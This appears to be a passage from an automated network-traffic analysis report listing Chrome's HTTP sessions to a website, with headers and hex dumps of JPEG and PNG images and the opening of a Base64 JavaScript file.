                                          2025-01-12 00:17:01 UTC16080INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 02 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 78 04 b0 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 01 05 01 01 01 01 01 00 00 00 00 00 00 00 00 07 03 04 05 06 08 02 09 01 00 0a ff c4 00 56 10 00 01 04 01 02 04 04 04 03 06 02 07 04 06 04 0f 02 01 03 04 05 06 11 12 00 07 13 21 14 22 31 41 15 23 32 51 08 61 71 16 24
                                          Data Ascii: JFIFHHCCxV!"1A#2Qaq$
                                          2025-01-12 00:17:01 UTC16384INData Raw: 44 fd 97 5b 35 ed e8 9f 7e 12 e9 2c ba d9 ed ed c2 5d 7a c9 5d ba a6 ba 7e 9c 35 79 74 d0 f6 d7 4f 4e da 70 8e 29 2c 9f 82 2a a0 ff 00 75 e2 12 a4 09 c0 86 ed 4b ed e9 c3 2e a4 0c ba 70 0d a8 f9 be fe 9c 34 95 2b 1b 65 d2 26 aa aa bd bb f0 89 d6 4e 9a 4f 4e de fd f8 8d c9 ed 4e 51 14 97 df b7 bf 0c 29 e0 27 8d f9 47 d3 cc be 9c 44 52 a5 74 54 fb ea 5a 6a bc 35 3a cb b1 fa bb f7 41 4d 07 84 4f 09 76 d3 4d 55 7d 57 86 12 9e c1 c4 a7 02 2b d8 51 15 75 f5 e1 b7 53 5b 44 e0 5b dd dd 7b 20 f1 1d d4 8d 6a 59 05 57 44 1e c9 ee bf 6e 11 39 2c 23 ae bd ff 00 4e 18 54 a0 68 97 11 d3 55 fb fa 70 c2 95 2e 29 db 4e 18 4a 78 4a e9 af 0c 4f 4e 40 7f cf 86 12 a4 09 d2 27 b2 76 4e 23 53 80 9d 34 89 dd 74 ee 9e fc 46 e4 a3 75 20 82 a8 88 1a ee f7 5e 21 bf 15 2a fa 28 a9 a2
                                          Data Ascii: D[5~,]z]~5ytONp),*uK.p4+e&NONNQ)'GDRtTZj5:AMOvMU}W+QuS[D[{ jYWDn9,#NThUp.)NJxJON@'vN#S4tFu ^!*(
                                          2025-01-12 00:17:01 UTC16384INData Raw: db ed 47 34 43 5f 91 25 c1 79 bd 3a 8d 1b 65 f6 4e 36 b8 8d 1b a6 8c 48 06 a4 2e 6f 43 55 d4 ca 58 78 1f 25 fb 91 7c f7 bf fc 29 65 50 f0 0c da 64 eb be 4c df 4a 08 d8 e5 db c6 ae bd 5c e9 e8 2c c3 92 ea f6 ea 20 f6 61 ed 76 be 08 8d 9a a3 82 25 c6 31 f1 98 0d c6 dc 47 d4 2d dd 3c c2 a5 b6 3e d7 3e 7d cb 6a 73 a3 93 d5 39 85 3c 3e 68 72 ca 4c 67 77 b6 b3 59 93 0b bb 2a d9 77 23 41 4e fd 22 5e ce b7 ea 05 df 44 d1 51 1d 2c 62 56 a7 b2 43 11 b1 59 76 b2 ed 6c 91 c8 f2 9a 28 17 b5 65 d3 99 10 f4 55 07 34 fc d1 50 84 93 f2 d0 91 74 5f 74 e0 63 c7 3d d1 46 10 e4 41 e5 1f 35 6c f9 27 3a 64 79 6d 94 fe 54 4e 90 d2 ce ab 02 f9 98 ec 99 6e 8b 69 22 36 f2 5d 61 12 af 9c 75 d5 b5 d0 7b ea 0a 6e a4 98 c5 ff 00 1f 97 f0 99 55 07 59 ff 00 2f 9f f2 8e 1c ee e4 d4 49 71
                                          Data Ascii: G4C_%y:eN6H.oCUXx%|)ePdLJ\, av%1G-<>>}js9<>hrLgwY*w#AN"^DQ,bVCYvl(eU4Pt_tc=FA5l':dymTNni"6]au{nUY/Iq
                                          2025-01-12 00:17:01 UTC16384INData Raw: e7 96 dc 0d fd e1 54 39 ab cd 0b 0e 64 64 b5 eb 41 1a ca 86 a6 14 25 66 05 7c b2 f1 92 1f 47 5f 3f 98 f0 0e d4 d7 72 6d 1d 9a 9f dc 97 b2 70 03 16 af 8a b0 87 86 e8 de fd 79 ef f7 42 ab 2a 2e d0 d6 1d 77 27 f8 5f 71 2b be 6c a6 41 51 57 1c 71 d3 1b 57 c2 34 39 92 e2 ad 7b 2c 1b 68 44 8e 3a eb c0 9e 41 44 5d db 4f 77 b8 f9 97 b8 ac 23 06 8b 12 ab 8e 2a 6b b2 62 ee c9 cd b1 e6 08 d8 f2 d3 b9 04 aa c4 5d 49 4e f9 26 17 60 1a f2 b2 f4 8a 90 a7 78 18 ad 5a cf 83 71 38 98 44 97 61 10 3a 6c ba 45 a8 ea 23 bc fb 7e 6a ba af aa f1 f6 46 13 49 53 4d 46 c8 ea 25 eb 64 68 d5 d6 cb 7f 25 f3 c5 74 f0 cf 50 e7 43 1e 46 1d 9b 7b d9 42 55 79 eb 6a 17 45 d3 c2 46 15 f7 d3 46 91 17 fe 5c 68 1d b9 f3 42 59 b0 f2 4f 0d bd 34 d1 7e e9 b7 d3 d1 78 f0 29 ae 62 af 65 51 9a 96 dd
                                          Data Ascii: T9ddA%f|G_?rmpyB*.w'_q+lAQWqW49{,hD:AD]Ow#*kb]IN&`xZq8Da:lE#~jFISMF%dh%tPCF{BUyjEFF\hBYO4~x)beQ
                                          2025-01-12 00:17:01 UTC16384INData Raw: 48 0c 4e c0 5e 81 2b c3 df cc 72 71 b7 f1 26 56 7a 79 62 99 8a 02 2f 4f 6e e1 40 11 52 15 43 24 55 d3 82 73 e2 35 13 db 30 b6 e3 b8 db 8f 9a a9 8b c9 20 d3 37 77 76 89 c7 2a a9 e1 e4 f1 9c a7 b1 86 c4 81 eb fe e0 f2 a6 d3 67 7a e8 48 d9 89 06 ba 2a ef d3 5d 3d 7f 4e 00 e2 73 18 dc 1d 7f 1e f4 09 80 3b da 43 fb 3a bc 8b 29 c6 b3 f8 34 d4 48 6b 55 7f ae 1f 15 a7 17 59 ad d6 3f b0 5e 7d c7 08 d3 ce 9d 4f 40 4d 50 89 04 57 54 e3 5f 46 22 a4 92 22 5d bb 7b 5c 75 23 90 fb f0 47 ea 68 7f 0f 4a 5a cd dc 01 f9 1d d2 42 d4 e2 8f 8f d8 46 2b a6 6f ea d0 7c 5c 47 84 94 8d b1 ea 01 bc db cb e5 25 da a0 8a 05 a2 ae 8b ea 8b c5 49 40 25 da 8b 14 1e 7a 57 93 65 a8 79 57 96 45 c4 6b ad a7 3d 61 1e 9c 5e 79 bb 49 51 25 57 04 d2 9c db 4d 6d 18 54 53 37 22 c4 7d f3 11 27 01
                                          Data Ascii: HN^+rq&Vzyb/On@RC$Us50 7wv*gzH*]=Ns;C:)4HkUY?^}O@MPWT_F""]{\u#GhJZBF+o|\G%I@%zWeyWEk=a^yIQ%WMmTS7"}'
                                          2025-01-12 00:17:01 UTC16384INData Raw: b8 db 35 ae b4 dd ef 2c 5f 9f 8c bd 98 43 b9 a6 8d 8f 33 21 b8 60 dc 49 41 30 de 71 c5 5d 35 16 8c 81 8e 98 f7 54 71 50 b4 fe 5e 33 f2 d5 b5 9a 38 1b fa f2 43 6b 68 a7 94 99 49 fe 55 33 03 a7 a6 97 98 d1 47 c8 08 8f 1b 8f 61 1c 2c 2c 97 4e a3 a4 6e 08 ab 22 f2 a6 d6 b5 0d 7c c9 a2 8f 6d 15 17 4e 25 96 56 b7 5e 1c 55 1a 48 47 58 ad bc cd c7 79 89 9b 66 92 31 1c 7e 5b cd 64 4c c9 98 20 d1 be e3 4e a4 36 04 9c 75 42 63 fb 08 dd 92 2d 09 6f 2d 10 b4 14 d5 35 ed 5b 0a 96 28 e5 79 78 b0 d4 f9 f3 f0 e4 b7 b8 6d 65 34 52 0e b0 5c 21 9f 2e f3 ce 73 e1 d7 56 18 cd 3e 4b 98 e0 f5 4d 59 c7 67 27 85 30 c0 bc 2c 78 ab ba 40 0b 33 1b 78 82 51 89 2a 36 6d 26 e2 25 4d 35 1e 34 ff 00 89 64 22 e4 dc 1e 5c 79 11 e0 b5 f8 95 0e 1f 3c 61 ed 1d ab 69 6f af 72 97 ba a8 e6 08 66
                                          Data Ascii: 5,_C3!`IA0q]5TqP^38CkhIU3Ga,,Nn"|mN%V^UHGXyf1~[dL N6uBc-o-5[(yxme4R\!.sV>KMYg'0,x@3xQ*6m&%M54d"\y<aiorf
                                          2025-01-12 00:17:01 UTC16384INData Raw: 16 8a 34 49 33 1e 83 e2 1d 0f 13 ab ee 0b 62 d2 38 20 be 61 25 45 25 d5 11 35 86 46 c3 0b 88 d6 cd 76 bc c0 bd b6 d0 5e f6 ef 54 ea 2a 98 d3 ec da c4 ef e2 ac 92 31 da 5c 6e 87 04 cf e8 ef a1 37 06 e2 3b 81 90 3d 1e d5 a9 71 ae 9b 94 c2 22 24 7d 8a 24 e3 b1 ba 66 29 f2 51 3d 94 bf 97 87 55 40 7a b2 d2 de d5 f4 e0 5b e4 75 1d eb 3b 49 52 67 9c b0 f0 f9 85 9f f9 8c f5 3f 2e e3 58 bb 6d 45 4a f2 73 0a fc a2 61 2f 41 79 a5 9a 8c bc c4 79 ee 21 20 75 c5 b0 6c a5 1b 28 60 df d4 a4 9d d5 35 e0 d3 30 ba 99 1a c7 67 d1 ad d7 88 27 e0 4e 96 bf 0d 11 09 df 19 20 0f 68 f3 e7 a8 fa 7b 90 17 18 c9 43 97 99 8b 76 79 bc ab 99 b8 ab d5 4e 41 84 b3 5f 71 cf 85 82 9a 10 8b 1d 55 51 da de aa 22 3a a6 e1 25 ee 8b db 8b f5 30 7e 36 1c 90 80 1f 7b e9 fa 8f f2 b6 d0 e1 02 2a 0b
                                          Data Ascii: 4I3b8 a%E%5Fv^T*1\n7;=q"$}$f)Q=U@z[u;IRg?.XmEJsa/Ayy! ul(`50g'N h{CvyNA_qUQ":%0~6{*
                                          2025-01-12 00:17:01 UTC16384INData Raw: c9 10 f2 22 64 11 52 be 46 aa 9a 69 e3 a2 0f 87 35 ef db 73 25 df d7 87 b6 a9 ed d0 a6 3a 95 ae d4 14 40 95 9b f2 77 98 69 15 33 fc 09 d8 24 66 3a d9 74 56 5c 33 da 5b d3 ab 22 bb 5d e1 b9 10 b6 c8 67 66 ba 2a a7 6e 0a 52 63 52 43 ec bc 84 36 a3 0a 64 9e d3 41 4d 66 72 6e 83 24 62 b2 e7 05 ce 23 e5 d0 eb a4 b4 f4 7a a9 af b7 22 33 2c 47 15 12 65 3c 18 ec de 4d a9 26 af b6 ab e9 dd 38 d2 d3 74 b1 c1 96 7b 41 ef 1b fa f7 20 13 f4 71 a5 d9 9a e3 e0 76 f5 ef 42 4e 60 72 7f 22 bc 9a 51 73 bc 64 2a f1 68 e4 db 6c 5d c2 46 ec 66 ba 40 6a 2b d1 98 00 69 5e 2e f5 76 fd 2a 66 89 a7 91 74 e0 e4 38 dd 25 47 ea b1 ef d3 fc fb d0 89 30 aa 98 35 b6 9d da ed f2 59 d2 87 94 b4 38 2c 6c 62 35 4c cb 99 73 2a de ac 99 55 19 e5 19 71 2b 65 d6 59 3e 5e 32 c8 1b 46 de 60 55 d7
                                          Data Ascii: "dRFi5s%:@wi3$f:tV\3["]gf*nRcRC6dAMfrn$b#z"3,Ge<M&8t{A qvBN`r"Qsd*hl]Ff@j+i^.v*ft8%G05Y8,lb5Ls*Uq+eY>^2F`U
                                          2025-01-12 00:17:01 UTC16384INData Raw: 8a e2 64 72 e1 b7 5e ed 54 1b aa d9 83 6e c7 89 9d 20 cd b1 29 20 bf 30 fa ce 90 1a 92 35 ea a4 8d 88 a6 89 ae 91 a3 30 6c 7e c8 f3 1e f5 b8 c2 2a df f8 39 64 94 f6 89 d8 f6 4d 80 b6 df 2d fc 49 42 7c 46 24 ca 4a 8c 6e 97 14 93 a5 9d d9 9b d3 66 96 f2 6d d6 00 fc 13 f1 87 54 42 da f6 e5 12 d1 13 46 44 d5 74 55 ef 6a d6 6e e8 04 a5 cf 94 91 b7 af 5e 2a d1 02 8b 12 55 72 b7 13 7e 92 ba f6 ba ac 20 d9 28 ca 95 3e 54 a6 03 53 7a 4c 87 5c 12 55 16 fc 50 34 aa a9 a8 22 08 2a a9 37 aa e7 f1 07 cc e3 72 3b 3d c8 c7 57 23 18 35 36 3c fe 43 89 47 9e 52 b8 c5 47 34 29 4e 2d bc 2a 6a 88 a0 e5 75 ac 82 f9 6d bb 19 63 b8 e1 ee 42 24 44 1d c2 8e ee 25 f2 fa a2 2a f6 e0 10 a5 fc 5b 7a 97 7e ae 3c 8f 05 5a ba 9d e6 02 e2 2e 7e bb 20 5e 7d 90 62 19 4f 31 6f 33 cc 65 99 47
                                          Data Ascii: dr^Tn ) 050l~*9dM-IB|F$JnfmTBFDtUjn^*Ur~ (>TSzL\UP4"*7r;=W#56<CGRG4)N-*jumcB$D%*[z~<Z.~ ^}bO1o3eG
                                          2025-01-12 00:17:01 UTC16384INData Raw: 42 18 eb 66 d7 4f 5e f4 4d c1 a7 cf 1c fa 1f 2e 9c a5 bf b8 e5 f5 86 0d 22 8c 61 57 b2 ec 95 69 ab 67 c6 6c 52 d5 15 10 4a 34 94 3f 39 92 77 4d db b7 2a 70 fa 27 cb 59 06 61 ab b3 7c b7 d3 bf 43 65 9a 9f 0e 99 ee cc 07 62 db fa ee 54 3c 17 0f cd 72 6e 61 60 95 96 03 61 39 f8 56 f3 6a 33 89 52 95 5a 6c 2a 6b 7c 37 8b 66 51 b5 b1 b2 8c 4d 81 ec ee 9f 33 bf d4 a8 bc 1b e8 e5 33 aa 2b bf 0a d3 94 3a d7 00 fe 9e d1 77 ba da a1 58 cc 2c a0 a0 7c 93 0b 91 7b 73 bf e9 b2 ab fe 22 6c e0 65 d9 55 54 fc 64 59 93 41 57 18 2a 21 3c 05 d5 1d 90 5e 7a 14 72 7b ba ec 27 06 3e a2 8b ea 3a 2f e7 c5 03 17 e1 6a a7 61 20 80 eb 02 3f 50 1c 42 12 d7 0a 88 62 78 07 56 fb 95 a2 2e 1b 26 7e 1b 8e 7c 1b 25 81 99 83 4c c9 58 d4 55 88 24 dc 28 ea 23 2d ee 83 8a a0 b2 5c ea b8 e0 b8
                                          Data Ascii: BfO^M."aWiglRJ4?9wM*p'Ya|CebT<rna`a9Vj3RZl*k|7fQM33+:wX,|{s"leUTdYAW*!<^zr{'>:/ja ?PBbxV.&~|%LXU$(#-\


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          28192.168.2.449777154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC359OUTGET /images/ico_search.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC298INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:00 GMT
                                          Content-Type: image/png
                                          Content-Length: 541
                                          Last-Modified: Fri, 10 Jan 2025 07:04:22 GMT
                                          Connection: close
                                          ETag: "6780c676-21d"
                                          Expires: Tue, 11 Feb 2025 00:17:00 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:01 UTC541INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 13 00 00 00 13 08 06 00 00 00 72 50 36 cc 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 01 81 49 44 41 54 38 cb 9d d4 3b 6b 54 51 14 05 e0 2f f3 20 89 44 63 20 8e 88 af 42 c6 46 cc a3 09 62 9a a0 08 76 fe 01 ff 82 8f 9f 60 65 6d 0a 3b 7f 82 85 08 5a 09 6a 93 10 52 04 62 21 71 0a 8b 51 49 31 82 af e0 c8 4c 46 8b bb 23 67 ae 33 93 31 ab 39 7b dd bb ce 62 9f bd f7 39 23 7a e3 08 ce a3 12 fc 23 de e1 a7 01 18 c9 f1 09 dc c0 7c 0f 6d 1b eb 78 82 dd fd
                                          Data Ascii: PNGIHDRrP6gAMAa cHRMz&u0`:pQ<bKGDCpHYs~IDAT8;kTQ/ Dc BFbv`em;ZjRb!qQI1LF#g319{b9#z#|mx


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          29192.168.2.449779154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC611OUTGET /images/slider-arrow.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/style/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC299INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:00 GMT
                                          Content-Type: image/png
                                          Content-Length: 1377
                                          Last-Modified: Fri, 10 Jan 2025 07:04:35 GMT
                                          Connection: close
                                          ETag: "6780c683-561"
                                          Expires: Tue, 11 Feb 2025 00:17:00 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:01 UTC1377INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 eb 00 00 00 46 08 06 00 00 00 2d 88 63 e5 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 22 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                          Data Ascii: PNGIHDRF-ctEXtSoftwareAdobe ImageReadyqe<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          30192.168.2.449780154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC604OUTGET /images/tt_bg.png HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/style/style.css
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC298INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:00 GMT
                                          Content-Type: image/png
                                          Content-Length: 927
                                          Last-Modified: Fri, 10 Jan 2025 07:04:35 GMT
                                          Connection: close
                                          ETag: "6780c683-39f"
                                          Expires: Tue, 11 Feb 2025 00:17:00 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:01 UTC927INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 08 06 00 00 00 1f 15 c4 89 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 30 36 37 20 37 39 2e 31 35 37 37 34 37 2c 20 32 30 31 35 2f 30 33 2f 33 30 2d 32 33 3a 34 30 3a 34 32 20 20
                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          31192.168.2.449778154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC366OUTGET /system/resource/js/base64.js HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: */*
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: cors
                                          Sec-Fetch-Dest: empty
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC351INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:00 GMT
                                          Content-Type: application/javascript; charset=utf-8
                                          Content-Length: 4749
                                          Last-Modified: Fri, 10 Jan 2025 07:04:21 GMT
                                          Connection: close
                                          Vary: Accept-Encoding
                                          ETag: "6780c675-128d"
                                          Expires: Tue, 11 Feb 2025 00:17:00 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:01 UTC4749INData Raw: 2f 2a 2a 20 20 0d 0a 2a 20 20 0d 0a 2a 20 20 42 61 73 65 36 34 20 65 6e 63 6f 64 65 20 2f 20 64 65 63 6f 64 65 20 20 0d 0a 2a 20 20 e6 96 87 e5 ad 97 e9 87 87 e7 94 a8 55 54 46 2d 38 e6 96 b9 e5 bc 8f e8 bf 9b e8 a1 8c 42 61 73 65 36 34 e7 bc 96 e7 a0 81 0d 0a 2a 20 20 0d 0a 2a 2f 20 20 0d 0a 20 20 20 20 0d 0a 66 75 6e 63 74 69 6f 6e 20 42 61 73 65 36 34 28 29 20 7b 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 2f 2f 20 70 72 69 76 61 74 65 20 70 72 6f 70 65 72 74 79 20 20 20 0d 0a 20 20 20 20 5f 6b 65 79 53 74 72 20 3d 20 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 3b 20 20 20 0d 0a 20 20 20 20 0d 0a
                                          Data Ascii: /** * * Base64 encode / decode * UTF-8Base64* */ function Base64() { // private property _keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          32192.168.2.449781154.216.143.264435436C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-12 00:17:00 UTC612OUTGET /images/21/11/25/1p6vg4xelj/banner-1.jpg HTTP/1.1
                                          Host: www.ccsurj.org
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          sec-ch-ua-platform: "Windows"
                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                          Sec-Fetch-Site: same-origin
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: image
                                          Referer: https://www.ccsurj.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-12 00:17:01 UTC304INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Sun, 12 Jan 2025 00:17:00 GMT
                                          Content-Type: image/jpeg
                                          Content-Length: 274578
                                          Last-Modified: Fri, 10 Jan 2025 07:04:27 GMT
                                          Connection: close
                                          ETag: "6780c67b-43092"
                                          Expires: Tue, 11 Feb 2025 00:17:00 GMT
                                          Cache-Control: max-age=2592000
                                          Accept-Ranges: bytes
                                          2025-01-12 00:17:01 UTC16080INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff db 00 43 00 02 02 02 02 02 02 02 02 02 02 02 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff db 00 43 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 01 78 04 b0 03 01 11 00 02 11 01 03 11 01 ff c4 00 1e 00 00 02 02 03 01 01 01 01 00 00 00 00 00 00 00 00 06 07 04 05 02 03 08 01 09 00 0a ff c4 00 51 10 00 01 03 03 03 02 04 04 04 04 04 02 08 03 02 0f 02 01 03 04 05 06 11 00 12 21 13 31 07 14 22 41 15 32 51 61 08 23 42 71 16
                                          Data Ascii: JFIFHHCCxQ!1"A2Qa#Bq
